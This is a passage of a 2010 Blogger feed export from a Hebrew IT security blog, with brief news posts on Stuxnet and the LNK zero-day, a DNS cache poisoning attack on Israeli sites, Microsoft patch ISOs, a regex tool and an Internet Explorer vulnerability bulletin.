&lt;a href="http://feedads.g.doubleclick.net/~a/eLWDnchcff_6qYBRZ1Oc2X4wQlA/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/eLWDnchcff_6qYBRZ1Oc2X4wQlA/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://sec-see.blogspot.com/feeds/5876512756723050383/comments/default" title="תגובות לפרסום" /><link rel="replies" type="text/html" href="http://sec-see.blogspot.com/2010/07/geo-ip-perl-ip.html#comment-form" title="1 תגובות" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/5876512756723050383?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/5876512756723050383?v=2" /><link rel="alternate" type="text/html" href="http://sec-see.blogspot.com/2010/07/geo-ip-perl-ip.html" title="GEO IP  - שימוש ב PERL לזיהוי מקורות שמות אתרים וכתובות IP" /><author><name>Cooper</name><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_vzNe-NaiwJI/TFRFth6ZURI/AAAAAAAAAPw/iAhQeQ_d-Lg/s72-c/31-07-2010+18-47-31.png" height="72" width="72" /><thr:total>1</thr:total></entry><entry gd:etag="W/&quot;A0EBQ3s6eyp7ImA9Wx5TFUk.&quot;"><id>tag:blogger.com,1999:blog-841260240678943543.post-2761831107256993258</id><published>2010-07-31T07:14:00.000+03:00</published><updated>2010-07-31T07:14:12.513+03:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-07-31T07:14:12.513+03:00</app:edited><title>Stuxnet - וירוס חדש +ZERO DAY חדש</title><content type="html">&lt;div dir="rtl" style="text-align: right;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_vzNe-NaiwJI/TFOimzB_LWI/AAAAAAAAAPY/xWMr4RHp5EU/s1600/images.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://4.bp.blogspot.com/_vzNe-NaiwJI/TFOimzB_LWI/AAAAAAAAAPY/xWMr4RHp5EU/s200/images.jpg" width="161" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;רימה חדשה נחתה ביולי 2010 .בכינויים:stuxnet&lt;span class="Apple-style-span" style="border-collapse: collapse; color: #545454; font-family: 'Segoe UI', Tahoma, Arial; font-size: 13px;"&gt;&lt;span id="ctl00_pageContent_contentCenter_ctl00_repeaterResults_ctl00_repeaterAliases_ctl00_lblAlias" style="font-family: 'Segoe UI', Tahoma, Arial !important;"&gt;Stuxnet&lt;/span&gt;&amp;nbsp;&lt;span id="ctl00_pageContent_contentCenter_ctl00_repeaterResults_ctl00_repeaterAliases_ctl00_lblVendor" style="font-family: 'Segoe UI', Tahoma, Arial !important;"&gt;(McAfee)&lt;/span&gt;&amp;nbsp;,&amp;nbsp;&lt;span id="ctl00_pageContent_contentCenter_ctl00_repeaterResults_ctl00_repeaterAliases_ctl02_lblAlias" style="font-family: 'Segoe UI', Tahoma, Arial !important;"&gt;RTKT_STUXNET.A&lt;/span&gt;&amp;nbsp;&lt;span id="ctl00_pageContent_contentCenter_ctl00_repeaterResults_ctl00_repeaterAliases_ctl02_lblVendor" style="font-family: 'Segoe UI', Tahoma, Arial !important;"&gt;(Trend Micro)&lt;/span&gt;&amp;nbsp;,&amp;nbsp;&lt;span id="ctl00_pageContent_contentCenter_ctl00_repeaterResults_ctl00_repeaterAliases_ctl04_lblAlias" style="font-family: 'Segoe UI', Tahoma, Arial !important;"&gt;Win32/Stuxnet.A&lt;/span&gt;&amp;nbsp;&lt;span id="ctl00_pageContent_contentCenter_ctl00_repeaterResults_ctl00_repeaterAliases_ctl04_lblVendor" style="font-family: 'Segoe UI', Tahoma, Arial !important;"&gt;(CA)&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&amp;nbsp;.&lt;div&gt;שני דברים מעניינים בתולעת הזאת ושעבורם הגוף שהזמין את התולעת שילם ה ר ב ה &amp;nbsp;כסף &amp;nbsp;להאקר:&lt;/div&gt;&lt;div&gt;&lt;ol style="text-align: right;"&gt;&lt;li&gt;התולעת מתקינה שני דרייברים (עבור הROOTKIT) הנראים חתומים בחיתום חוקי של חברת &amp;nbsp;&lt;span class="Apple-style-span" style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 12px; line-height: 20px; word-spacing: 2px;"&gt;Realtek ,מעניין איך זה קרה...&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 12px; line-height: 20px; word-spacing: 2px;"&gt;שימוש ב ZERODAY חדש הפועל על כל סוגי מערכות ההפעלה חלונות :&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: 'Segoe UI', 'Lucida Grande', Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;CVE-2010-2568 המנצל פגיעות בקיצור דרך ,קבצי .LNK.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: 'Segoe UI', 'Lucida Grande', Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: 'Segoe UI', 'Lucida Grande', Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;התולעת מתרבה דרך התקני USB ושיתופים ברשת וזאת ללא שימוש במנגנון ה AUTORUN הידוע לשימצה ונחסם ברוב הארגונים.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: 'Segoe UI', 'Lucida Grande', Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: 'Segoe UI', 'Lucida Grande', Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;לבדיקת ה ZERODAY מול מערכות ההגנה הארגוניות :&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: 'Segoe UI', 'Lucida Grande', Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: black; font-family: 'Times New Roman'; font-size: medium; line-height: normal;"&gt;&lt;a href="http://www.metasploit.com/modules/exploit/windows/browser/ms10_xxx_windows_shell_lnk_execute"&gt;http://www.metasploit.com/modules/exploit/windows/browser/ms10_xxx_windows_shell_lnk_execute&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: 'Segoe UI', 'Lucida Grande', Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: 'Segoe UI', 'Lucida Grande', Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;מידע נוסף:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: 'Segoe UI', 'Lucida Grande', Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: black; font-family: 'Times New Roman'; font-size: medium; line-height: normal;"&gt;&lt;a href="http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx"&gt;http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: 'Segoe UI', 'Lucida Grande', Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx"&gt;&lt;/a&gt;&lt;a href="http://www.digitalwhisper.co.il/0x27/"&gt;http://www.digitalwhisper.co.il/0x27/&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://www.digitalwhisper.co.il/0x27/"&gt;&lt;/a&gt;&amp;nbsp;&lt;br /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/841260240678943543-2761831107256993258?l=sec-see.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/n3fDjU5SbUcRv6MYgr05eeot1AI/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/n3fDjU5SbUcRv6MYgr05eeot1AI/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/n3fDjU5SbUcRv6MYgr05eeot1AI/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/n3fDjU5SbUcRv6MYgr05eeot1AI/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://sec-see.blogspot.com/feeds/2761831107256993258/comments/default" title="תגובות לפרסום" /><link rel="replies" type="text/html" href="http://sec-see.blogspot.com/2010/07/stuxnet-zero-day.html#comment-form" title="1 תגובות" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/2761831107256993258?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/2761831107256993258?v=2" /><link rel="alternate" type="text/html" href="http://sec-see.blogspot.com/2010/07/stuxnet-zero-day.html" title="Stuxnet - וירוס חדש +ZERO DAY חדש" /><author><name>Cooper</name><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_vzNe-NaiwJI/TFOimzB_LWI/AAAAAAAAAPY/xWMr4RHp5EU/s72-c/images.jpg" height="72" width="72" /><thr:total>1</thr:total></entry><entry gd:etag="W/&quot;CUIHSHc8eip7ImA9WxFVEkQ.&quot;"><id>tag:blogger.com,1999:blog-841260240678943543.post-1350074524050999000</id><published>2010-06-12T00:58:00.000+03:00</published><updated>2010-06-12T00:58:59.972+03:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-06-12T00:58:59.972+03:00</app:edited><title>התקפה טורקית על אתרים ישראליים באמצעות DNS cache poisoning</title><content type="html">&lt;div dir="rtl" style="text-align: right;" trbidi="on"&gt;&lt;div class="separator" style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none; clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_vzNe-NaiwJI/TBKxTomspaI/AAAAAAAAAPQ/-8Msq41iX18/s1600/Ams-ix.k.root-servers.net.jpg" imageanchor="1" style="clear: right; cssfloat: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" qu="true" src="http://3.bp.blogspot.com/_vzNe-NaiwJI/TBKxTomspaI/AAAAAAAAAPQ/-8Msq41iX18/s320/Ams-ix.k.root-servers.net.jpg" /&gt;&lt;/a&gt;&lt;a href="http://1.bp.blogspot.com/_vzNe-NaiwJI/TBKwG3Y1MeI/AAAAAAAAAO4/RTaK7Xt8wY4/s1600/11-06-2010+17-03-12.jpg" imageanchor="1" style="clear: right; cssfloat: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="205" qu="true" src="http://1.bp.blogspot.com/_vzNe-NaiwJI/TBKwG3Y1MeI/AAAAAAAAAO4/RTaK7Xt8wY4/s320/11-06-2010+17-03-12.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;"&gt;ביום חמישי ה 10.6.2010 התבצעה התקפת &lt;a href="http://en.wikipedia.org/wiki/DNS_cache_poisoning"&gt;DNS cache poisoning&lt;/a&gt; על מספר אתרים&amp;nbsp;ישראליים ע"י קבוצת &lt;span class="goog-spellcheck-word" style="background: yellow;"&gt;ההאקרים&lt;/span&gt; הטורקית TurkGuvenligi Tayfa&amp;nbsp; .החברות מיהרו לעדכן ולתקן את הרשומות ב DNS אך עבור משתמשים רבים מאחורי אמצעי CACHEING ארגוניים ( ISA ודומיו)&amp;nbsp; התופעה נמשכה לאורך כל אותו היום.&lt;/div&gt;&lt;div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;"&gt;הדף שהופנו אליו המשתמשים ממוקם בשיקגו.&lt;/div&gt;&lt;div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;"&gt;FYI&lt;/div&gt;&lt;br /&gt;
&lt;div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_vzNe-NaiwJI/TBKwPaAQDaI/AAAAAAAAAPA/F29JMQPjjLQ/s1600/11-06-2010+17-26-47.jpg" imageanchor="1" style="clear: right; cssfloat: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="187" qu="true" src="http://2.bp.blogspot.com/_vzNe-NaiwJI/TBKwPaAQDaI/AAAAAAAAAPA/F29JMQPjjLQ/s400/11-06-2010+17-26-47.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_vzNe-NaiwJI/TBKw1yHJdDI/AAAAAAAAAPI/wB80dmQbxg0/s1600/12-06-2010+00-53-59.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" qu="true" src="http://1.bp.blogspot.com/_vzNe-NaiwJI/TBKw1yHJdDI/AAAAAAAAAPI/wB80dmQbxg0/s320/12-06-2010+00-53-59.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/841260240678943543-1350074524050999000?l=sec-see.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/gyT3goFtOIme3UDZ6cKwRJnVBMA/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/gyT3goFtOIme3UDZ6cKwRJnVBMA/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/gyT3goFtOIme3UDZ6cKwRJnVBMA/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/gyT3goFtOIme3UDZ6cKwRJnVBMA/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://sec-see.blogspot.com/feeds/1350074524050999000/comments/default" title="תגובות לפרסום" /><link rel="replies" type="text/html" href="http://sec-see.blogspot.com/2010/06/dns-cache-poisoning.html#comment-form" title="0 תגובות" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/1350074524050999000?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/1350074524050999000?v=2" /><link rel="alternate" type="text/html" href="http://sec-see.blogspot.com/2010/06/dns-cache-poisoning.html" title="התקפה טורקית על אתרים ישראליים באמצעות DNS cache poisoning" /><author><name>Cooper</name><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_vzNe-NaiwJI/TBKxTomspaI/AAAAAAAAAPQ/-8Msq41iX18/s72-c/Ams-ix.k.root-servers.net.jpg" height="72" width="72" /><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;Ck4NRno6fCp7ImA9WxFXF0w.&quot;"><id>tag:blogger.com,1999:blog-841260240678943543.post-2541895578889196623</id><published>2010-05-24T17:23:00.000+03:00</published><updated>2010-05-24T17:23:17.414+03:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-05-24T17:23:17.414+03:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="miscrosoft" /><category scheme="http://www.blogger.com/atom/ns#" term="Administration how to" /><category scheme="http://www.blogger.com/atom/ns#" term="patch" /><title>windows update ISO DVD</title><content type="html">&lt;div dir="rtl" style="text-align: right;" trbidi="on"&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_vzNe-NaiwJI/S_qLrklNZBI/AAAAAAAAAOw/YTH0iEQ07t0/s1600/1202608.jpg" imageanchor="1" style="clear: right; cssfloat: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" gu="true" height="200" src="http://4.bp.blogspot.com/_vzNe-NaiwJI/S_qLrklNZBI/AAAAAAAAAOw/YTH0iEQ07t0/s200/1202608.jpg" width="193" /&gt;&lt;/a&gt;&lt;/div&gt;מיקרוסופט&amp;nbsp;מאפשרת הורדה של דיסקים(ISO) המכילים את עדכוני האבטחה החודשיים .&lt;br /&gt;
זאת אופציה טובה עבור איזורים מאובטחים ומנותקים ברשת המצריכים גישה פיזית בלבד להרצת עדכונים וכן עבור ארגונים המיישמים מספר שפות בסניפים ברחבי העולם ולא משתמש באפליקציות כגון WSUS &lt;br /&gt;
הדיסקים מכילים את כל השפות וכל מערכות ההפעלה כולל בx64 &lt;br /&gt;
לקריאה נוספת:&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://support.microsoft.com/kb/913086"&gt;http://support.microsoft.com/kb/913086&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/841260240678943543-2541895578889196623?l=sec-see.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/Je2kRxj3SJWBRzY1mR1mfHcu6mE/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Je2kRxj3SJWBRzY1mR1mfHcu6mE/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/Je2kRxj3SJWBRzY1mR1mfHcu6mE/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Je2kRxj3SJWBRzY1mR1mfHcu6mE/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://sec-see.blogspot.com/feeds/2541895578889196623/comments/default" title="תגובות לפרסום" /><link rel="replies" type="text/html" href="http://sec-see.blogspot.com/2010/05/windows-update-iso-dvd.html#comment-form" title="1 תגובות" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/2541895578889196623?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/2541895578889196623?v=2" /><link rel="alternate" type="text/html" href="http://sec-see.blogspot.com/2010/05/windows-update-iso-dvd.html" title="windows update ISO DVD" /><author><name>Cooper</name><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_vzNe-NaiwJI/S_qLrklNZBI/AAAAAAAAAOw/YTH0iEQ07t0/s72-c/1202608.jpg" height="72" width="72" /><thr:total>1</thr:total></entry><entry gd:etag="W/&quot;CUUMQnw6eip7ImA9WxFXFU8.&quot;"><id>tag:blogger.com,1999:blog-841260240678943543.post-531738064920483376</id><published>2010-05-20T23:37:00.002+03:00</published><updated>2010-05-22T13:14:43.212+03:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-05-22T13:14:43.212+03:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Hacking stuff" /><category scheme="http://www.blogger.com/atom/ns#" term="Administration how to seurity" /><category scheme="http://www.blogger.com/atom/ns#" term="programming" /><category scheme="http://www.blogger.com/atom/ns#" term="security pen testing tools" /><title>Regex Creator - הדרך הקלה לתשלום האגרה</title><content type="html">&lt;div dir="rtl" style="text-align: right;" trbidi="on"&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_vzNe-NaiwJI/S_euecLRXGI/AAAAAAAAAOo/sOb2YhAF_-c/s1600/regex_tee_opt.jpg" imageanchor="1" style="clear: right; cssfloat: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" gu="true" height="270" src="http://4.bp.blogspot.com/_vzNe-NaiwJI/S_euecLRXGI/AAAAAAAAAOo/sOb2YhAF_-c/s400/regex_tee_opt.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
מי לא נתקל בצורך להשתמש ב REGEX בתוך הסקריפטים שלו ,למצוא את ה regex &amp;nbsp;המדוייק הוא נושא כאוב אך מחויב המציאות.&lt;br /&gt;
הכלי החינמי&amp;nbsp;&lt;a href="http://sourceforge.net/projects/regexcreator/"&gt;הזה&lt;/a&gt;&amp;nbsp;הוא הפתרון המושלם לבעיה ,באמצעותו ניתן לגזור את הביטוי הרגולרי מתוך הטקסט ולבצע בדיקות התאמה , בנוסף ניתן לבנות חיתוך לקבוצות אשר יוצבו כערכים למשתנים בסקריפט.&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_vzNe-NaiwJI/S_ZHLeJsITI/AAAAAAAAAOg/Wnq5lPrRx0M/s1600/Screenshot-1.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="250" src="http://2.bp.blogspot.com/_vzNe-NaiwJI/S_ZHLeJsITI/AAAAAAAAAOg/Wnq5lPrRx0M/s400/Screenshot-1.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;הכלי מבוסס JAVA וניתן להרצה על כל פלטפורמה התומכת ב JAVA .&lt;br /&gt;
כמו שרואים בצילום המסך , מדביקים את ה טקסט במסך העליון ,לאחר מכן ניתן לסמן חלקים כקבועים (delimiters) או כמשתנים- (group) , לאחר שממפים את כל הטקסט ,לוחצים עלgenerate regex &lt;br /&gt;
ומעתיקים לסקריפט.&lt;br /&gt;
מומלץ בחום .&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/841260240678943543-531738064920483376?l=sec-see.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/lJWrKjP1ldk9X0d9xS3wrIJgYwY/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/lJWrKjP1ldk9X0d9xS3wrIJgYwY/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/lJWrKjP1ldk9X0d9xS3wrIJgYwY/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/lJWrKjP1ldk9X0d9xS3wrIJgYwY/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://sec-see.blogspot.com/feeds/531738064920483376/comments/default" title="תגובות לפרסום" /><link rel="replies" type="text/html" href="http://sec-see.blogspot.com/2010/05/regex-creator.html#comment-form" title="0 תגובות" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/531738064920483376?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/531738064920483376?v=2" /><link rel="alternate" type="text/html" href="http://sec-see.blogspot.com/2010/05/regex-creator.html" title="Regex Creator - הדרך הקלה לתשלום האגרה" /><author><name>Cooper</name><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_vzNe-NaiwJI/S_euecLRXGI/AAAAAAAAAOo/sOb2YhAF_-c/s72-c/regex_tee_opt.jpg" height="72" width="72" /><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;A0QERXo8fip7ImA9WxFTEkU.&quot;"><id>tag:blogger.com,1999:blog-841260240678943543.post-7932041212635684006</id><published>2010-04-03T13:08:00.000+03:00</published><updated>2010-04-03T13:08:24.476+03:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-04-03T13:08:24.476+03:00</app:edited><title>Microsoft Security Bulletin MS10-018 - Critical - התשובה ל  CVE-2010-0806</title><content type="html">&lt;div dir="rtl" style="text-align: right;" trbidi="on"&gt;להורדה:&lt;br /&gt;
&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms10-018.mspx"&gt;http://www.microsoft.com/technet/security/bulletin/ms10-018.mspx&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/841260240678943543-7932041212635684006?l=sec-see.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/zxo77JjmmVNfJnh2_Z2OFGxbWdY/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/zxo77JjmmVNfJnh2_Z2OFGxbWdY/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/zxo77JjmmVNfJnh2_Z2OFGxbWdY/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/zxo77JjmmVNfJnh2_Z2OFGxbWdY/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://sec-see.blogspot.com/feeds/7932041212635684006/comments/default" title="תגובות לפרסום" /><link rel="replies" type="text/html" href="http://sec-see.blogspot.com/2010/04/microsoft-security-bulletin-ms10-018.html#comment-form" title="0 תגובות" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/7932041212635684006?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/7932041212635684006?v=2" /><link rel="alternate" type="text/html" href="http://sec-see.blogspot.com/2010/04/microsoft-security-bulletin-ms10-018.html" title="Microsoft Security Bulletin MS10-018 - Critical - התשובה ל  CVE-2010-0806" /><author><name>Cooper</name><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;CkYHQHk4fyp7ImA9WxBaFUU.&quot;"><id>tag:blogger.com,1999:blog-841260240678943543.post-7275975083317795427</id><published>2010-03-24T11:42:00.003+02:00</published><updated>2010-03-26T08:08:51.737+03:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-26T08:08:51.737+03:00</app:edited><title>yet another zero day for microsoft iexplorer-CVE-2010-0806</title><content type="html">&lt;div dir="rtl" style="text-align: right;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_vzNe-NaiwJI/S6xAbWu4fSI/AAAAAAAAAOQ/GI6XL_v7UBc/s1600/ie-hiba.jpg" imageanchor="1" style="clear: right; cssfloat: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" nt="true" src="http://4.bp.blogspot.com/_vzNe-NaiwJI/S6xAbWu4fSI/AAAAAAAAAOQ/GI6XL_v7UBc/s320/ie-hiba.jpg" 